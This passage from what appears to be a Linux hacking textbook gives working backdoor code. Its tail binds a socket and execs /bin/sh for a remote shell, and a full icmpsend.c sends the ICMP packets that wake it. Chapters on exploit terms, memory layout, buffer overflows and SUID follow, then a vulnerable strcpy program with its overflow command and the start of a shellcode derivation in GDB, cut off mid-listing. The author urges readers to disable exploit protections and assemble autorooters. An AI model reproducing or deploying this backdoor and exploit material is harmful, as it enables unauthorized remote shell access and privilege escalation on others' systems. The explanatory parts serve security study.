            if (bind(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)))
                perror("bind() failed");

            listen(sd, 1);
            cli = accept(sd, NULL, 0);
            dup2(cli, 0);
            dup2(cli, 1);
            dup2(cli, 2);
            execl("/bin/sh", "sh", (char *)NULL);
        }
    }
}





The icmpsend utility (Listing 11.5) is a simple utility for sending ICMP packets. Several
such utilities were considered in the previous chapters, for example, in Section 6.1.1; therefore,
in this section, I will not go over it in detail. On the command line, the icmpsend utility must
be passed the source and destination IP addresses, an optional port number (which will be
stored in the icmp_seq field of the ICMP header), and an optional ICMP message type (see
Table 3.1). If the port number is not specified on the command line, the default port, 31337,
is used. If the ICMP message type is not specified, message type 0 (Echo Reply) is used by default.

The value of the Identifier field (icmp_id) is set to 0xABCD. Any other value can be used,
but don't forget to modify the source code of the backdoor accordingly so that it will expect
this value.





Listing 11.5. The utility for sending wakeup packets (icmpsend.c) 





#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>

unsigned short in_cksum(unsigned short *addr, int len)
{
    unsigned short result;
    unsigned int sum = 0;

    while (len > 1) {
        sum += *addr++;
        len -= 2;
    }

    if (len == 1)
        sum += *(unsigned char *) addr;

    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    result = ~sum;

    return result;
}

int main(int argc, char *argv[])
{
    int sd;
    const int on = 1;
    int type, port;
    struct sockaddr_in servaddr;

    char sendbuf[sizeof(struct iphdr) + sizeof(struct icmp)];

    struct iphdr *ip_hdr = (struct iphdr *)sendbuf;
    struct icmp *icmp_hdr = (struct icmp *) (sendbuf +
                                             sizeof(struct iphdr));

    port = 31337;
    type = 0;

    if ((argc < 3) || (argc > 5)) {
        fprintf(stderr,
                "Usage: %s <srcip> <dstip> [port] [type]\n"
                "port - default 31337\n"
                "type - default Echo Reply(0).\n",
                argv[0]);
        exit(-1);
    }

    if (argc > 3)
        port = atoi(argv[3]);
    if (argc == 5)
        type = atoi(argv[4]);

    printf("Port: %d, Type: %d.\n", port, type);

    sd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
    if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0)
    {
        perror("setsockopt() failed");
        exit(-1);
    }

    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = inet_addr(argv[2]);

    bzero(sendbuf, sizeof(sendbuf));   /* clear unset header fields */

    ip_hdr->ihl = 5;
    ip_hdr->version = 4;
    ip_hdr->tos = 0;
    ip_hdr->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmp));
    ip_hdr->id = htons(getuid());
    ip_hdr->ttl = 255;
    ip_hdr->protocol = IPPROTO_ICMP;
    ip_hdr->saddr = inet_addr(argv[1]);
    ip_hdr->daddr = inet_addr(argv[2]);

    ip_hdr->check = 0;
    ip_hdr->check = in_cksum((unsigned short *)ip_hdr, sizeof(struct iphdr));

    icmp_hdr->icmp_type = type;
    icmp_hdr->icmp_code = 0;
    icmp_hdr->icmp_id = 0xABCD;
    icmp_hdr->icmp_seq = port;
    icmp_hdr->icmp_cksum = 0;
    icmp_hdr->icmp_cksum = in_cksum((unsigned short *)icmp_hdr, sizeof(struct icmp));

    if (sendto(sd,
               sendbuf,
               sizeof(sendbuf),
               0,
               (struct sockaddr *)&servaddr,
               sizeof(servaddr)) < 0) {
        perror("sendto() failed");
        exit(-1);
    }
    printf("Packet sent successfully.\n");
    close(sd);
    return 0;
}
UDP backdoors are not considered in this chapter. Usually, such backdoors consist of a
server part and a client part, because it is difficult to set up communications with a UDP
backdoor without a client part. The issues of encrypting the traffic between the client and the
server parts of a backdoor are not considered either. Encryption is employed to conceal the
backdoor from sniffers and intrusion-detection systems and is usually implemented using
a simple algorithm like XOR, although more complex algorithms can be used: Blowfish,
IDEA, XTEA, and the like. Encryption also requires that the backdoor have client and
server parts. Sometimes, backdoors are fitted with an authentication feature so that only their
master can use them. Implementing authentication in backdoors is not considered
here, either. If you have carefully read and understood all the presented material, you should have
enough knowledge to implement all of these features by yourself.

Techniques for concealing backdoors are considered in Chapter 21, where rootkit pro- 
gramming is discussed. 

The source codes for all programs in this section can be found in the /PART II/Chapter 11
directory on the accompanying CD-ROM.
Beyond any doubt, exploits are the most powerful and widely used hacker weapon. Hackers
who can find vulnerabilities and write exploits for them belong to the hacker elite. These are
not just high-flown words, because being able to program exploits requires deep knowledge of
operating systems, C and assembler languages, and other computer technologies. Reaching the
top takes time and effort, and you have to start somewhere and sometime. When you start working
toward the top of the hacker world is up to you, but when you decide you are ready, the material
in this chapter will be a good starting point.


12.1. Terms and Definitions 


An exploit is a program that takes advantage of a vulnerability in software to execute foreign, 
usually malicious, code. Often, shortened forms of the word are used in the hacker milieu, for 
example, sploit or xploit. 

All exploits are customarily divided into two large classes: local exploits and remote
exploits, which differ substantially in how they are implemented. Local exploits are intended
for exploiting errors on local machines, and remote exploits use networks to take advantage 
of errors on remote machines. 

This book considers the most commonly used and the most difficult type of local and 
remote exploits: shellcode exploits, which launch a command shell on the compromised system 
(as a rule, /bin/sh in Linux). In addition to launching a command shell, an exploit can per- 
form other actions; for example, it can modify the firewall rules. The core part of this type of 
exploit is shellcode, which is sometimes called an exploit payload. Shellcode is machine code 
that is introduced into the memory of a vulnerable program and launches a system shell.
However, not all exploits take advantage of a found vulnerability to launch a shell. For exam- 
ple, some exploits, called DoS exploits, use it to simply crash the attacked system. In essence, 
DoS exploits are utilities for carrying out DoS attacks, which were considered in Chapter 6. 

The specifics of programming exploits greatly depend on the programming language
in which the vulnerable program was written. Each programming language has its own
specific bugs. For example, Perl and PHP programs are prone to the so-called poison NULL byte
bug, while C/C++ programs are not. There also are errors that affect many programming
languages, for example, the array indexing error.

Because the exploits considered in this book target programs written in C, they take advantage
of errors typical of this language, such as stack, heap, or BSS buffer overflow errors or
format string errors. However, an exploit need not be written in the same language as its
target; for example, an exploit written in Perl can take advantage of errors in C programs.

Often, you can hear hackers talking about a zero-day exploit, private exploit, fake exploit, 
PoC, and autorooter or massrooter. Here is what these terms mean: 


❑ A 0-day (zero-day) exploit is a fresh exploit for errors for which no patches have been developed
and no corrected version of the software has been released. Usually, when an exploit for a
vulnerability comes out, the developers of the affected software issue a patch or a new version
of the software with the vulnerability closed. This makes the exploit obsolete. At first,
only a small group of hackers know about a zero-day exploit, but with time information
about it usually becomes public. Zero-day exploits are highly valued (in
monetary terms, too), which makes them the most sought-after exploits, especially among
script kiddies.

❑ Private exploits are, just like the name implies, known only to their creators.
Usually, with time either the author makes a private exploit a zero-day exploit or it becomes
one through accidental disclosure. Private exploits are as attractive as zero-day ones
to script kiddies and others.

❑ Fake exploits are programs that imitate exploits but are not actually exploits. Often,
fake exploits are Trojans masquerading as exploits. After such an “exploit” is
launched, it installs a backdoor on the victim’s machine and sends an email to its creator
about this event. Usually, fake exploits are directed against script kiddies, who will
recklessly launch any program. There are whole groups that trade in fake exploits, passing
them off as zero-day exploits. Because administrators also use exploits to test their systems,
I would advise any administrator against obtaining exploits from suspicious sources and
recommend carefully inspecting an exploit’s code before using it. One way of checking
an exploit is to convert the hexadecimal codes of the shellcode into their character
equivalents, because fake exploits often contain destructive commands in their shellcodes.

❑ The PoC (proof of concept) acronym is often used by security professionals instead of
the term exploit. Information about discovered vulnerabilities is presented in two types 
of reports: proof of concept theory and proof of concept code. The latter term usually 
denotes the exploit. 

❑ An autorooter is a package of one or more exploits and other hacker utilities, such as a port
scanner or a security scanner. An autorooter may be implemented as a single file or as
multiple interlinked files. Autorooters are created by smart but lazy hackers to make the
task of breaking into servers easier. An autorooter scans a network for vulnerable
machines, compromises those found, and then informs its master about this. In other words,
an autorooter performs a mass automatic break-in over a network. Therefore, autorooters are
also called massrooters. A massrooter’s operation is analogous to that of an Internet worm,
except that it is controlled by the hacker. At the time the material for this book was
researched, few autorooters were available, but undoubtedly this state of affairs will not
last. Autorooters that can be found in public Internet archives include massrooterfinal by
Daddy_cad, lpd_autorooter by dave, and OpenSSL-uzi by Harden. The immense cracking
power made available by autorooters makes them particularly dangerous in the hands of
script kiddies, who never really cared about how cracking tools worked and can only
point, click, and crack.


The subject of programming autorooters is not covered in this book; however, the book 
gives sufficient information on its separate components to make it possible for you to com- 
bine them into an autorooter of your own. 


12.2. Structure of Process Memory 


To be able to develop exploits, you must know the particularities of the operating system the 
exploit is aimed at. Because only Linux exploits are considered in this book, review some spe- 
cifics of this operating system. 

A program stored on the disk is different from its image loaded into memory. A program
being executed in memory is called a process. A process can operate in two modes:
kernel mode and user mode. In user mode, a process executes instructions allowed at the
unprivileged processor security level. When a process requires some kernel services, it makes a
system call, which executes kernel instructions at the privileged processor security level. In
this way, the kernel protects its address space from access by application processes, which could
otherwise corrupt kernel data structures and crash the operating system. Accordingly,
the image of a process consists of two parts: a kernel-mode part and a user-mode part.

A process image in the user mode consists of separate segments: code, data, stack, shared 
libraries, and other structures that it can directly access. A process image in the kernel mode 
consists of data structures that cannot be accessed by the process in the user mode: process 
control structures, memory mapping tables, and others. 

On 32-bit x86 Linux, each process is allocated 4 GB of virtual address space. The upper 1 GB of
the virtual memory is allocated to the system kernel, and the lower 3 GB are allocated to the user
mode process. In Linux systems, the user-mode part of the virtual address space extends up to
address 0xc0000000, where the kernel part begins (Fig. 12.1).
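Here is the arithmetic behind the 3 GB/1 GB split on 32-bit x86, worked out as a quick check:

$$\mathtt{0xC0000000} = 12 \cdot 16^{7} = 3 \cdot 2^{30} = 3\,221\,225\,472\ \text{bytes} = 3\ \text{GB}$$

$$2^{32} - 3 \cdot 2^{30} = 2^{30}\ \text{bytes} = 1\ \text{GB}\quad(\text{addresses } \mathtt{0xC0000000} \ldots \mathtt{0xFFFFFFFF})$$

So user-mode addresses run from 0x00000000 to 0xBFFFFFFF.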

The order of the user mode process segments depends on the format of the executable file. 
In Linux, the main format of executable files is ELF (see Chapter 15). Although there are other 
formats (e.g., the common object file format), only ELF is considered in this book. Figure 12.2 
shows the location of the main segments of a process loaded from an ELF file. 
Fig. 12.1. The kernel mode and the user mode of the process virtual address space

Fig. 12.2. The user-mode virtual memory of a process

Starting from address 0xc0000000 at the top of the user space, segments are loaded into the
virtual memory in the following order:

1. External variables such as environment variable strings (the program’s name and path, the
home directory, the mailbox name, the terminal name, etc.), command-line arguments
(argv), environment variable pointers (env pointers), command-line argument pointers (argv
pointers), and the argc parameter

2. The stack segment, which is used to temporarily store variables

3. The heap segment, which is used by the application to allocate the amount of memory
needed and to manage its size, that is, to perform dynamic memory allocation

4. The .bss segment, which contains uninitialized data

5. The .data segment, which contains initialized data

6. The .text segment, also called the code segment, which contains the program’s
instructions; this segment is read only

7. The shared libraries segment


An exploit developer must know precisely which memory segments the variables declared and
defined in a program are placed in. This also depends on the type of the variable.
C has the following variable types:


❑ Global variables, whose scope extends over the entire program.

❑ Local variables, whose scope is limited to the function in which they are defined.

❑ Automatic variables, which are local variables that exist only as long as the function in
which they are declared is running. When the function terminates, the values of its local
variables are not preserved, and the memory allocated to those variables is released.

❑ Static variables, which are declared using the static keyword before the regular
declaration. Both local and global variables can be declared as static. Unlike automatic
variables, local static variables exist the entire time the program is running. The scope of
static global variables is limited to the file in which they are declared.

❑ Pointers, special variables that store the memory addresses at which the actual data are
stored. The 32-bit x86 architecture employs a 32-bit addressing system; therefore, on this
architecture a pointer is a 32-bit integer memory address.


All global and static variables are located in the .data segment if initialized and in the
.bss segment if uninitialized.

Automatic variables are stored on the stack.

A pointer variable itself is stored in the .bss segment if it is an uninitialized global or
static pointer (in which case its value is zero, i.e., NULL) or on the stack if it is automatic
(in which case its value is undetermined until it is assigned). When a process allocates memory
in the heap (e.g., using the malloc() function), the address of the first byte of this memory
space (also a 32-bit number) is placed into the pointer.


The program shown in Listing 12.1 demonstrates how variables are stored in memory.
Listing 12.1. Storing variables in memory











#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int var;                      // In BSS
char *str;                    // In BSS
int x = 111;                  // In data
static int y = 222;           // In data
char buffer1[666];            // A buffer in BSS
char mes1[] = "abcdef";       // In data

void f(int a, char *b)        // In the stack
{
    char p;                   // In the stack
    int num = 333;            // In the stack
    static int count = 444;   // In data
    char buffer2[777];        // A buffer in the stack
    char mes2[] = "zyxwvu";   // In the stack

    str = malloc(1000*sizeof(char));    // A buffer in the heap
    strncpy(str, "abcde", 5);           // Entering data in a buffer in the heap
    strncpy(buffer1, "Sklyaroff", 9);   // Entering data in a buffer in BSS
    strncpy(buffer2, "Ivan", 4);        // Entering data in a buffer in the stack
}

int main()
{
    f(1, "string");

    return 0;
}




The program, saved as sections.c, is compiled and loaded in GDB as follows:
# gcc sections.c -o sections -g

# gdb sections

(gdb) list
18
19          str = malloc(1000*sizeof(char));
20          strncpy(str, "abcde", 5);
21          strncpy(buffer1, "Sklyaroff", 9);
22          strncpy(buffer2, "Ivan", 4);
23      }
24
25      int main()
26      {
27          f(1, "string");


The following commands set a breakpoint at the end of the f() function and run the program:


(gdb) break 23
Breakpoint 1 at 0x804851c: file sections.c, line 23.




(gdb) run 
Starting program: sections 


Now, you can inspect how the variables are stored in memory:

(gdb) info symbol &var
var in section .bss
(gdb) info symbol &str
str in section .bss
(gdb) info symbol &x
x in section .data
(gdb) info symbol &y
y in section .data
(gdb) info symbol &buffer1
buffer1 in section .bss
(gdb) info symbol &mes1
mes1 in section .data
(gdb) info symbol &count
count.0 in section .data


The a, b, p, and num local variables and the buffer2 and mes2 buffers are stored on the stack. 


12.3. Concept of Buffer and Buffer Overflow 


A buffer is memory allocated for temporary data storage. Different devices, for example, printers or hard drives, can be equipped with a buffer to speed up their operation. In this book, only programmatic buffers are considered. In C programs, buffers can be defined in three memory segments: the stack, BSS, and heap. All three buffer types were defined in the program in Listing 12.1. A buffer is a certain number of bytes reserved in memory; for example, in the program shown in Listing 12.1, 666 bytes are reserved in BSS, 777 bytes on the stack, and 1,000 bytes in the heap. If a program does not check the amount of data written to a buffer, more bytes can be written to the buffer than the amount of memory allocated to it. This usually causes program errors of varying severity. Writing more data to a buffer than the memory allocated to it is called a buffer overflow error, or simply a buffer overflow. In the computer security community, this is often shortened even further to BoF.

Buffer overflow can be used to gain control over the machine on which it occurs. It is one of the most common and most dangerous errors in C programs, and most exploits are based on it. Exploiting a buffer overflow has its own specifics, depending on the memory segment in which it took place (i.e., the stack, BSS, or heap). This necessitates different approaches when developing an exploit. That is, an exploit taking advantage of a stack buffer overflow will be different from an exploit taking advantage of a heap buffer overflow, and both will be different from one taking advantage of a BSS buffer overflow. The specifics of exploits that take advantage of each of these buffer overflow types are considered in this book.
12.4. SUID Bit


Because a shellcode executes in the memory space of a vulnerable process, it acquires all the 
privileges of this process. Thus, if a vulnerable program is run with root privileges, when an 
exploit is applied to such a program and the exploit’s shellcode successfully executes, a shell 
can be opened that will also have root privileges. 

As a result, crackers are especially interested in vulnerable programs with the SUID bit set. As you remember, the SUID bit allows any user executing a file to run that file with the privileges of the file's owner. The SUID bit is set by the chmod utility. The set group identifier (SGID) bit works the same as the SUID bit except that the file is run with its group set to the group of the file, rather than the group of the user who started it.

Many functions require root privileges for their operation, for example, the socket() function when it is used to create raw sockets. So it's no surprise that many vulnerable programs have their SUID bit set, which gives them temporary root privileges. Exploits that open a shell with root privileges are especially valued by crackers.


12.5. AT&T Syntax 


To create shellcodes, you must know assembly language, and not just any assembly language but one using the AT&T syntax. Linux's standard assembler, as, uses the AT&T syntax; however, the tool a shellcode developer needs most is not this assembler but the GDB disassembler, which also outputs assembly instructions in the AT&T syntax. If you learned assembly programming under Windows (using TASM, MASM, or NASM), you already know the Intel syntax. This syntax is not significantly different from the AT&T syntax, so you will have no problems figuring out the latter. Table 12.1 lists the main differences between these two syntaxes, along with code examples.


Table 12.1. Comparing the two assembler syntaxes

Intel syntax                                 AT&T syntax

No prefixes are used in register names:      Registers are always prefixed with the
eax, ebx, ecx, ...                           percent sign: %eax, %ebx, %ecx, ...

Immediate operands are not prefixed with     Immediate operands are prefixed with
any special characters:                      the dollar sign:
push 1                                       push $1
sub esp, 50h                                 sub $0x50, %esp

In instructions with multiple operands,      In instructions with multiple operands,
the destination is specified first and       the source is specified first and the
the source last:                             destination last:
mov eax, 1                                   movl $1, %eax
imul eax, edx, 13                            imul $13, %edx, %eax

Operand size is indicated using a            Operand size is indicated using suffixes
directive:                                   to instructions:
byte ptr: byte                               b: byte
  (mov byte ptr variable, 1)                   (movb $1, variable)
word ptr: word                               w: word
  (mov word ptr variable, 100)                 (movw $100, variable)
dword ptr: double word                       l: double word
  (push dword ptr variable)                    (pushl variable)

The base register is specified in square     The base register is specified in
brackets:                                    parentheses:
lea edi, [ebp + variable]                    lea 0xfffffffc(%ebp), %edi

Indirect addressing has the following        Indirect addressing has the following
format:                                      format:
segreg:[base + index*scale + disp]           %segreg:disp(base, index, scale)
mov eax, base_addr[ebx + edi*4]              movl base_addr(%ebx, %edi, 4), %eax





12.6. Exploit Countermeasures 


Numerous defenses have been developed against buffer overflow and format string error 
vulnerabilities. For example, such systems as StackGuard, StackShield, ProPolice, Openwall 
(OWL), and Libsafe protect against stack buffer overflow. The PointGuard utility protects 
against overwriting function pointers in the .bss segment. The FormatGuard utility pro- 
tects against format string vulnerabilities. The Heap protection utility protects against heap 
buffer overflow. 

No methods for circumventing these defenses are considered in the book because each requires an individual approach; moreover, the hacker community has not yet found ways of circumventing many of them. Practically all modern Linux distributions install one or another type of defense by default. Therefore, many examples described in this part, including the exploits, may not work on your system. To practice your exploit-writing skills, you should either remove all defenses from your installation or install a Linux distribution without defenses. Older Linux versions can be used for the latter approach. For example, my Red Hat 7.1 has no defenses, and all examples considered in this book run under it with no problems.
13.1. Stack Buffer Overflow


The stack buffer overflow vulnerability was first exploited by the infamous Morris worm in 1988. But the real boom of exploits based on the stack buffer overflow error started after the renowned "Smashing the Stack for Fun and Profit" article by Aleph One in Phrack magazine (Issue #49, Article #14). The material presented in this section is in many respects based on that article.


13.1.1. Stack Frames 


To understand the stack overflow mechanism, you must understand the operation mecha- 
nism of the stack itself. 

The stack operates on the last in, first out (LIFO) principle; that is, the last value placed onto the stack is the first one taken off it. Placing a value onto the stack is called pushing, and taking a value off the stack is called popping. Accordingly, the assembler instructions that perform these operations are called push and pop.

The stack grows from the higher memory addresses toward the lower ones (Fig. 12.2). The address of the top of the stack is stored in the ESP register and constantly changes as values are pushed onto and popped off the stack. When a function is called, a group of data, called the stack frame, is pushed onto the stack. The data in the current stack frame are accessed using the EBP register. A stack frame contains the arguments passed to the function, its local variables, and two pointers for returning to the state preceding the function call: the stack frame pointer (SFP) and the return address. The SFP is needed to restore the previous value of the EBP register, and the return address is needed to load into the EIP register the address of the instruction that must be executed after the function returns. As you should remember, the address of the next instruction to execute is always stored in the EIP register.
Formation of a stack frame is demonstrated in Listing 13.1. 





Listing 13.1. Forming a stack frame 





void test_func(int A, int B, int C, int D)
{
    char foo;
    int boo;
    char buffer[100];
}
int main()
{
    test_func(10, 20, 30, 40);
}





When test_func() is called, a stack frame is formed on the stack as shown in Fig. 13.1. First the function arguments are pushed onto the stack (in this order: 40, 30, 20, 10), then the return address, then the current EBP value (the SFP), and finally space is reserved for the function's local variables (foo, boo, buffer). Because the stack grows downward, the arguments lie above the saved EBP value and are referenced at positive offsets from the EBP register (EBP + 8, EBP + 12, and so on), whereas the local variables lie below it and are referenced at negative offsets (EBP - 4, and so on).


[Fig. 13.1 diagram: the stack frame of test_func(), with high addresses (stack bottom) at the top, low addresses (stack top) at the bottom, and the stack frame pointer marked]

Fig. 13.1. A stack frame
When the program is started, the stack contains only one frame, for the main() function. It is called the starting or external frame. A new frame is created every time a function is called. When a function exits, the frame for its call is destroyed. Recursive function calls are handled like regular function calls, with a frame for each recursive call pushed onto the stack.


13.1.2. Vulnerable Program Example 


Consider an example of a vulnerable program (Listing 13.2). 


Listing 13.2. A vulnerable program (stack_vuln.c) 





#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buf[100];

    if (argc > 1) {
        strcpy(buf, argv[1]);
        printf("OK!\n");
    } else
        printf("Please, enter the argument!\n");

    return 0;
}

In this program, the strcpy() function does not check the size of the received data, which makes it possible to pass a string of any length to this function, for example:

# gcc stack_vuln.c -o stack_vuln

# ./stack_vuln `perl -e 'print "A"x150'`

Using the perl language with the -e option, which allows instructions to be executed from the command line, 150 A characters were passed to the program, 50 more than the buf buffer can hold.

Functions that do not check the size of the data passed to them are common in the C language; the strcat(), sprintf(), vsprintf(), and gets() functions are examples of these. Secure-programming guides usually recommend replacing these functions with their relatives that do check the size of the data they are passed. For the functions just named, the safe replacements are strncat(), snprintf(), vsnprintf(), and fgets(). But you should not assume that functions that check the size of the data they are passed are secure in all situations. For example, replace the strcpy() function in the vulnerable program in Listing 13.2 with the strncpy() function:

strncpy(buf, argv[1], strlen(argv[1])); // Wrong


The preceding example leaves the program vulnerable even though the strncpy() function limits the number of bytes it copies: here the limit is taken from the length of the source string rather than from the size of the destination buffer. In other words, even functions considered secure can become insecure if used incorrectly. The right way of using the strncpy() function is the following:

strncpy(buf, argv[1], sizeof(buf)); // Right

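Used in this way, the function will not write more than 100 bytes to the buffer, which eliminates the overflow. Note, however, that if argv[1] is 100 or more characters long, strncpy() does not append a terminating null character, so buf must be terminated explicitly (for example, buf[sizeof(buf) - 1] = '\0';) before it is used as a string.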

Thus, your task is to write a shellcode exploit that will overflow the buffer and overwrite the return address to pass control to the shellcode, which in turn launches a system shell with root privileges (uid=0(root) gid=0(root)).

I first show you how to write the shellcode and then how to build an exploit around it.

The source code for all programs in this section can be found in the /PART III/Chapter 13/13.1 directory on the accompanying CD-ROM.


13.1.3. Creating the Shellcode 
The C source code for the program to launch a system shell is shown in Listing 13.3. 


Listing 13.3. Shellcode launcher (shellcode.c) 





#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
    char *shell[2];
    shell[0] = "/bin/sh";
    shell[1] = NULL;
    execve(shell[0], shell, NULL);

    exit(0);
}
The execve() function was selected for starting a shell because, unlike the other functions of the exec() family, it is a true system call, which makes disassembling the code easier.

The program ends by calling the exit() function. If the execve() call fails, the shellcode will continue executing on the stack, meaning that whatever arbitrary data follow it will be fetched as instructions. This will almost certainly result in an abnormal termination of the program. The exit() function is used to ensure correct termination of the program in case of an unsuccessful execve() call.

Compile the shellcode.c file using the -g debugging option, and add the -static switch so that the library functions are linked into the executable and their code can be disassembled:

# gcc shellcode.c -o shellcode -g -static


Load the compiled program into the GDB debugger:
# gdb -q ./shellcode
First, disassemble the main() function (Listing 13.4). 
Listing 13.4. The disassembled main() function

(gdb) disassemble main
Dump of assembler code for function main:
0x80481e0 <main>:       push   %ebp
0x80481e1 <main+1>:     mov    %esp,%ebp
0x80481e3 <main+3>:     sub    $0x8,%esp
0x80481e6 <main+6>:     movl   $0x808e2c8,0xfffffff8(%ebp)
0x80481ed <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x80481f4 <main+20>:    sub    $0x4,%esp
0x80481f7 <main+23>:    push   $0x0
0x80481f9 <main+25>:    lea    0xfffffff8(%ebp),%eax
0x80481fc <main+28>:    push   %eax
0x80481fd <main+29>:    pushl  0xfffffff8(%ebp)
0x8048200 <main+32>:    call   0x804cbf0 <__execve>
0x8048205 <main+37>:    add    $0x10,%esp
0x8048208 <main+40>:    sub    $0xc,%esp
0x804820b <main+43>:    push   $0x0
0x804820d <main+45>:    call   0x80484bc <exit>
End of assembler dump.
(gdb)





The functions of interest are called at the 0x8048200 and 0x804820d addresses.
Now, disassemble the execve() and exit() functions (Listings 13.5 and 13.6).





Listing 13.5. The disassembled execve() function 





(gdb) disassemble execve
Dump of assembler code for function __execve:
0x804cbf0 <__execve>:       push   %ebp
0x804cbf1 <__execve+1>:     mov    $0x0,%eax
0x804cbf6 <__execve+6>:     mov    %esp,%ebp
0x804cbf8 <__execve+8>:     test   %eax,%eax
0x804cbfa <__execve+10>:    push   %edi
0x804cbfb <__execve+11>:    push   %ebx
0x804cbfc <__execve+12>:    mov    0x8(%ebp),%edi
0x804cbff <__execve+15>:    je     0x804cc06 <__execve+22>
0x804cc01 <__execve+17>:    call   0x0

; A pointer to the argument array is stored in %ecx.
; In the shellcode, the array's first element is set to the address
; of the /bin/sh string, and the second is set to NULL.
0x804cc06 <__execve+22>:    mov    0xc(%ebp),%ecx

; A pointer to the array of the program environment variables is stored
; in %edx. In the shellcode, it is set to NULL.
0x804cc09 <__execve+25>:    mov    0x10(%ebp),%edx
0x804cc0c <__execve+28>:    push   %ebx

; A pointer to the launch string (/bin/sh) is stored in %ebx.
0x804cc0d <__execve+29>:    mov    %edi,%ebx

; The number of the system call is stored in %eax.
0x804cc0f <__execve+31>:    mov    $0xb,%eax

; Calling interrupt 0x80.
0x804cc14 <__execve+36>:    int    $0x80
0x804cc16 <__execve+38>:    pop    %ebx
0x804cc17 <__execve+39>:    mov    %eax,%ebx
0x804cc19 <__execve+41>:    cmp    $0xfffff000,%ebx
0x804cc1f <__execve+47>:    jbe    0x804cc2f <__execve+63>
0x804cc21 <__execve+49>:    neg    %ebx
0x804cc23 <__execve+51>:    call   0x80484b0 <__errno_location>
0x804cc28 <__execve+56>:    mov    %ebx,(%eax)
0x804cc2a <__execve+58>:    mov    $0xffffffff,%ebx
0x804cc2f <__execve+63>:    mov    %ebx,%eax
0x804cc31 <__execve+65>:    pop    %ebx
0x804cc32 <__execve+66>:    pop    %edi
0x804cc33 <__execve+67>:    pop    %ebp
0x804cc34 <__execve+68>:    ret
End of assembler dump.
(gdb)





Listing 13.6. The disassembled exit() function 





(gdb) disassemble exit
Dump of assembler code for function exit:
0x80484bc <exit>:       push   %ebp
0x80484bd <exit+1>:     mov    %esp,%ebp
0x80484bf <exit+3>:     push   %esi
0x80484c0 <exit+4>:     push   %ebx
0x80484c1 <exit+5>:     mov    0x809cdb0,%edx
0x80484c7 <exit+11>:    test   %edx,%edx
0x80484c9 <exit+13>:    mov    0x8(%ebp),%esi
0x80484cc <exit+16>:    je     0x804853a <exit+126>
0x80484ce <exit+18>:    mov    %esi,%esi
0x80484d0 <exit+20>:    mov    0x4(%edx),%ebx
0x80484d3 <exit+23>:    test   %ebx,%ebx
0x80484d5 <exit+25>:    mov    %edx,%ecx
0x80484d7 <exit+27>:    je     0x8048518 <exit+92>
0x80484d9 <exit+29>:    lea    0x0(%esi),%esi
0x80484dc <exit+32>:    mov    0x4(%ecx),%eax
0x80484df <exit+35>:    dec    %eax
0x80484e0 <exit+36>:    mov    %eax,0x4(%ecx)
0x80484e3 <exit+39>:    shl    $0x4,%eax
0x80484e6 <exit+42>:    lea    (%eax,%ecx,1),%eax
0x80484e9 <exit+45>:    lea    0x8(%eax),%edx
0x80484ec <exit+48>:    mov    0x8(%eax),%eax
0x80484ef <exit+51>:    cmp    $0x4,%eax
0x80484f2 <exit+54>:    ja     0x8048509 <exit+77>
0x80484f4 <exit+56>:    jmp    *0x808e2e0(,%eax,4)
0x80484fb <exit+63>:    nop
0x80484fc <exit+64>:    sub    $0x8,%esp
0x80484ff <exit+67>:    pushl  0x8(%edx)
0x8048502 <exit+70>:    push   %esi
0x8048503 <exit+71>:    call   *0x4(%edx)
0x8048506 <exit+74>:    add    $0x10,%esp
0x8048509 <exit+77>:    mov    0x809cdb0,%edx
0x804850f <exit+83>:    mov    0x4(%edx),%eax
0x8048512 <exit+86>:    test   %eax,%eax
0x8048514 <exit+88>:    mov    %edx,%ecx
0x8048516 <exit+90>:    jne    0x80484dc <exit+32>
0x8048518 <exit+92>:    mov    (%edx),%eax
0x804851a <exit+94>:    test   %eax,%eax
0x804851c <exit+96>:    mov    %eax,0x809cdb0
0x8048521 <exit+101>:   je     0x804852f <exit+115>
0x8048523 <exit+103>:   sub    $0xc,%esp
0x8048526 <exit+106>:   push   %edx
0x8048527 <exit+107>:   call   0x804c1f4 <__libc_free>
0x804852c <exit+112>:   add    $0x10,%esp
0x804852f <exit+115>:   mov    0x809cdb0,%eax
0x8048534 <exit+120>:   mov    %eax,%edx
0x8048536 <exit+122>:   test   %edx,%edx
0x8048538 <exit+124>:   jne    0x80484d0 <exit+20>
0x804853a <exit+126>:   mov    $0x809bd84,%ebx
0x804853f <exit+131>:   cmp    $0x809bd88,%ebx
0x8048545 <exit+137>:   jae    0x8048555 <exit+153>
0x8048547 <exit+139>:   nop
0x8048548 <exit+140>:   call   *(%ebx)
0x804854a <exit+142>:   add    $0x4,%ebx
0x804854d <exit+145>:   cmp    $0x809bd88,%ebx
0x8048553 <exit+151>:   jb     0x8048548 <exit+140>
0x8048555 <exit+153>:   mov    %esi,0x8(%ebp)
0x8048558 <exit+156>:   lea    0xfffffff8(%ebp),%esp
0x804855b <exit+159>:   pop    %ebx
0x804855c <exit+160>:   pop    %esi
0x804855d <exit+161>:   pop    %ebp
0x804855e <exit+162>:   jmp    0x804cbd0 <_exit>
0x8048563 <exit+167>:   nop
0x8048564 <exit+168>:   call   *0x4(%edx)
0x8048567 <exit+171>:   jmp    0x8048509 <exit+77>
0x8048569 <exit+173>:   lea    0x0(%esi),%esi
0x804856c <exit+176>:   sub    $0x8,%esp
0x804856f <exit+179>:   push   %esi
0x8048570 <exit+180>:   pushl  0x8(%edx)
0x8048573 <exit+183>:   jmp    0x8048503 <exit+71>
End of assembler dump.
(gdb)





You can see that, after calling the registered exit handlers, exit() jumps to the _exit function at address 0x804855e; consequently, the actual termination is performed by _exit, which is only a wrapper for the exit system call. So, disassemble the _exit function (Listing 13.7).





Listing 13.7. The disassembled _exit function





(gdb) disassemble _exit
Dump of assembler code for function _exit:
